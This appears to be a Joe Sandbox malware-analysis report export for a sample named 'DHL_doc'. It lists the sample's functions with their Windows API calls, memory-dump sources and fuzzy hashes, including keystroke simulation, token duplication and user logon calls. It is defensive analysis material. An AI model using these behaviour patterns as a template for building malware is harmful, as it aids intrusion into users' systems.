Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d644f2e9c5e91b2466d661bc5206a729a04183b24a57af42ba2d00a42e0ac9e1
Instruction ID: c21f08675f3811978152300968e1a788263e19a8333282e3432a3cab2aa6649d
Opcode Fuzzy Hash: d644f2e9c5e91b2466d661bc5206a729a04183b24a57af42ba2d00a42e0ac9e1
Instruction Fuzzy Hash: 87F0B4B160226C66FB215F63AC05F7BB7D8BF417A5B187121BB15BB2D1CB30D80096E0

Function 00EF3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00F91444,?,00EDFDF5,?,?,00ECA976,00000010,00F91440,00EC13FC,?,00EC13C6,?,00EC1129), ref: 00EF3852

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4c22d37b8b7c5ac295c9c2bb9b40dc1347cbc4b52d17ca51040179ea7033e982
Instruction ID: e368f0e6778fb43d629c07d6616bd73544bba1a0be6896f1e4bbb7c88fb2ad69
Opcode Fuzzy Hash: 4c22d37b8b7c5ac295c9c2bb9b40dc1347cbc4b52d17ca51040179ea7033e982
Instruction Fuzzy Hash: 22E0E5312002ECA6D62526779D00BBA36C8AB427F4F152221BF09B65D1DB19DD0191E0

Function 00EC4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00F91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00EC4F6D

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 12b1820bc681fc150b55240d3755d5131b90e2d7dd11193aef29f2c2a996b499
Instruction ID: 450e8c6d6187c2a5380ae308d03caff390086c2f28ab95c10a84708947f07aa7
Opcode Fuzzy Hash: 12b1820bc681fc150b55240d3755d5131b90e2d7dd11193aef29f2c2a996b499
Instruction Fuzzy Hash: B4F0A0B0205782CFDB348F20D5A0E52B7E0BF00319310A97EE1DB92650C7329844DF10

Function 00F2CCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,00F0EE51,00F83630,00000002), ref: 00F2CD26

Part of subcall function 00F2CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,00F2CD19,?,?,?), ref: 00F2CC59
Part of subcall function 00F2CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,00F2CD19,?,?,?,?,00F0EE51,00F83630,00000002), ref: 00F2CC6E
Part of subcall function 00F2CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,00F2CD19,?,?,?,?,00F0EE51,00F83630,00000002), ref: 00F2CC7A

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: File$Pointer$Write
String ID:
API String ID: 3847668363-0
Opcode ID: b60043c108d6e448bc3747f123d59a786839fc60af6845f61e6c966a64047b24
Instruction ID: 9648f28aa1f5f67c6129759ba81706e632e54c07b087b0d9b70fb57223bd1a4f
Opcode Fuzzy Hash: b60043c108d6e448bc3747f123d59a786839fc60af6845f61e6c966a64047b24
Instruction Fuzzy Hash: 71E06576400714EFC7219F46ED00C9ABBF8FF84761710852FE956C2110D3B5AA14EBA0

Function 00EC2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EC2DC4

Part of subcall function 00EC6B57: _wcslen.LIBCMT ref: 00EC6B6A

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 2c2a4024ec217221029fa80efaf2e11f6d11da5be05a09c99c64a06d8778bb85
Instruction ID: 9960ca605e44fbcd5959a1ad2ed248a52588de9a5ac06643017620de2edb8a51
Opcode Fuzzy Hash: 2c2a4024ec217221029fa80efaf2e11f6d11da5be05a09c99c64a06d8778bb85
Instruction Fuzzy Hash: 66E0CD726002245BCB10D3589C05FDA77DDDFC8791F050075FD09E7248D964AD809590

Function 00EC2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00EC3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EC3908

Part of subcall function 00ECD730: GetInputState.USER32 ref: 00ECD807

SetCurrentDirectoryW.KERNEL32(?), ref: 00EC2B6B

Part of subcall function 00EC30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00EC314E

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 7e40e8d142452deb315417cd40b6b42e3293235a296993fac93e41896296a7aa
Instruction ID: 1277559b04f5ef2b54e1113baf7d140b8113b303133f6d8b6cab3982fc22e362
Opcode Fuzzy Hash: 7e40e8d142452deb315417cd40b6b42e3293235a296993fac93e41896296a7aa
Instruction Fuzzy Hash: D7E0862230434906CA08BB749A56F7DB7D99BD6355F40753EF143A31A3CE2749474291

Function 00F0039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00F00704,?,?,00000000,?,00F00704,00000000,0000000C), ref: 00F003B7

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a006e44704f0b9e429191c3d7437ce5da3eb34adb5d6576503eb2f5209acdeef
Instruction ID: 81aea5e8a333dc1fc6080a04f77d6ac14860e673010d1df81670e2f69b844476
Opcode Fuzzy Hash: a006e44704f0b9e429191c3d7437ce5da3eb34adb5d6576503eb2f5209acdeef
Instruction Fuzzy Hash: 83D06C3204020DBFDF028F84DD06EDA3BAAFB48714F014000BE1856020C732E821AB90

Function 00EC1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00EC1CBC

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 4844e6fabc6578a6643fbae6b37921186b6cc0cb3d236bc9b6042707c81c75ea
Instruction ID: 3cf51d46182c1d544826e466779b7632cf37fddaf6d2c113aa089f676d172b0d
Opcode Fuzzy Hash: 4844e6fabc6578a6643fbae6b37921186b6cc0cb3d236bc9b6042707c81c75ea
Instruction Fuzzy Hash: E6C0923A28030DAFF2148BD0BC4AF107764B348B01F488002F70EA95E3D7B22820FA90

Function 00F3744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00EC5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00EC949C,?,00008000), ref: 00EC5773

GetLastError.KERNEL32(00000002,00000000), ref: 00F376DE

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 8e9f495932a8925428da7bfd9234ab68bcb6caeb1f7b424ea59987eb31875bf8
Instruction ID: 88892fc138c7144b052687b39705273539043feef7bf5a88428fc1e41aedac56
Opcode Fuzzy Hash: 8e9f495932a8925428da7bfd9234ab68bcb6caeb1f7b424ea59987eb31875bf8
Instruction Fuzzy Hash: 7A81A2706087019FC714EF28C5A2B6DB7E1AF88324F04551DF8866B3A2DB34ED46DB52

Function 00EDFC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00EDFD1F

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 3f2a45f2f5a6974f3238914eade4afed498077e17c65fd847d817f16ed186888
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 52310674A00109DBC718CF59D480A69F7A2FF49308B24A6A6E80AEF755D731EDD2CBC0

Function 00EC6246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000000,00F024E0), ref: 00EC6266

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 32b7c199b8fc62200d418831e147f31f2fd2354ab6b9e38cd05f59e75710cec5
Instruction ID: 3dbbfd9d4c5558fed8e86e4669991d82017c2c33f61aa32b1582675bf92b92e7
Opcode Fuzzy Hash: 32b7c199b8fc62200d418831e147f31f2fd2354ab6b9e38cd05f59e75710cec5
Instruction Fuzzy Hash: 26E0B675400B01CFD3354F1AE904952FBF5FFE13653204A2ED1E6A2670E3B158869F50

Function 024C22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 024C22B1

Memory Dump Source

Source File: 00000000.00000002.1707663242.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24c0000_DHL_doc.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: b5cabd3fecf8dd3bf86fe3ce69bfdde26ce66564bf3ddd0b075cc9cc6f49817a
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: F4E0E67494020EDFDB00EFB8D64969E7FB4EF04301F100165FD01D2280D6709D508A72

Non-executed Functions

Function 00F59576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00ED9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00F5961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F5965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00F5969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F596C9
SendMessageW.USER32 ref: 00F596F2
GetKeyState.USER32(00000011), ref: 00F5978B
GetKeyState.USER32(00000009), ref: 00F59798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F597AE
GetKeyState.USER32(00000010), ref: 00F597B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F597E9
SendMessageW.USER32 ref: 00F59810
SendMessageW.USER32(?,00001030,?,00F57E95), ref: 00F59918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00F5992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F59941
SetCapture.USER32(?), ref: 00F5994A
ClientToScreen.USER32(?,?), ref: 00F599AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F599BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F599D6
ReleaseCapture.USER32 ref: 00F599E1
GetCursorPos.USER32(?), ref: 00F59A19
ScreenToClient.USER32(?,?), ref: 00F59A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00F59A80
SendMessageW.USER32 ref: 00F59AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00F59AEB
SendMessageW.USER32 ref: 00F59B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F59B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F59B4A
GetCursorPos.USER32(?), ref: 00F59B68
ScreenToClient.USER32(?,?), ref: 00F59B75
GetParent.USER32(?), ref: 00F59B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00F59BFA
SendMessageW.USER32 ref: 00F59C2B
ClientToScreen.USER32(?,?), ref: 00F59C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F59CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00F59CDE
SendMessageW.USER32 ref: 00F59D01
ClientToScreen.USER32(?,?), ref: 00F59D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F59D82

Part of subcall function 00ED9944: GetWindowLongW.USER32(?,000000EB), ref: 00ED9952

GetWindowLongW.USER32(?,000000F0), ref: 00F59E05

Strings

F, xrefs: 00F59D07
@GUI_DRAGID, xrefs: 00F5997D

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: 85ac0bfa8684cda1e79d12d63e9d55c23af0eef7df448f47df2a75049630778c
Instruction ID: 3e80aa832224eb451fe66967b3cce56fb3b5c5ace252ae8af1d0daa47ff29c38
Opcode Fuzzy Hash: 85ac0bfa8684cda1e79d12d63e9d55c23af0eef7df448f47df2a75049630778c
Instruction Fuzzy Hash: 7842BF30608305EFDB29CF24CD44BAABBE5FF49321F14061DFA59872A1D7B19859EB81

Function 00F54873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00F548F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00F54908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00F54927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00F5494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00F5495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00F5497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00F549AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00F549D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00F54A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00F54A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00F54A7E
IsMenu.USER32(?), ref: 00F54A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F54AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F54B20
GetWindowLongW.USER32(?,000000F0), ref: 00F54B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00F54BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00F54C82
wsprintfW.USER32 ref: 00F54CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F54CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00F54CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F54D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F54D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00F54D5A

Strings

%d/%02d/%02d, xrefs: 00F54CA8

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 5863abf9b3c62efca265d7c39b62a8c28265cd9ffab1160500208514db821950
Instruction ID: 1bcfa8383ce873a2070b343d7ca028df6bf3942fa360c9550f94537d71d99aea
Opcode Fuzzy Hash: 5863abf9b3c62efca265d7c39b62a8c28265cd9ffab1160500208514db821950
Instruction Fuzzy Hash: EE12D371900318ABEB248F28CC49FAE7BF4EF45725F104119FA1AEB2D1D774A985EB50

Function 00EDF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00EDF998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F1F474
IsIconic.USER32(00000000), ref: 00F1F47D
ShowWindow.USER32(00000000,00000009), ref: 00F1F48A
SetForegroundWindow.USER32(00000000), ref: 00F1F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F1F4AA
GetCurrentThreadId.KERNEL32 ref: 00F1F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F1F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 00F1F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00F1F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00F1F4DE
SetForegroundWindow.USER32(00000000), ref: 00F1F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1F4F6
keybd_event.USER32(00000012,00000000), ref: 00F1F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1F50B
keybd_event.USER32(00000012,00000000), ref: 00F1F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1F519
keybd_event.USER32(00000012,00000000), ref: 00F1F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1F528
keybd_event.USER32(00000012,00000000), ref: 00F1F52D
SetForegroundWindow.USER32(00000000), ref: 00F1F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 00F1F557

Strings

Shell_TrayWnd, xrefs: 00F1F46F

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: da269b133a309274a333a981ec4acbfddb65e2df1351eefd6127bcc49787ce07
Instruction ID: 015f58d127646292220780adfd4f0bd848a64983d91921bfaf40a5228d330b02
Opcode Fuzzy Hash: da269b133a309274a333a981ec4acbfddb65e2df1351eefd6127bcc49787ce07
Instruction Fuzzy Hash: 06318E71A4031CBFEB206BB59C4AFBF7E6DEB44B61F140065FB06E61D1D6B05940BAA0

Function 00F21201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00F216C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F2170D
Part of subcall function 00F216C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F2173A
Part of subcall function 00F216C3: GetLastError.KERNEL32 ref: 00F2174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00F21286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00F212A8
CloseHandle.KERNEL32(?), ref: 00F212B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F212D1
GetProcessWindowStation.USER32 ref: 00F212EA
SetProcessWindowStation.USER32(00000000), ref: 00F212F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F21310

Part of subcall function 00F210BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F211FC), ref: 00F210D4
Part of subcall function 00F210BF: CloseHandle.KERNEL32(?,?,00F211FC), ref: 00F210E9

Strings

default, xrefs: 00F2130B
winsta0, xrefs: 00F212CC
, xrefs: 00F2125A

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

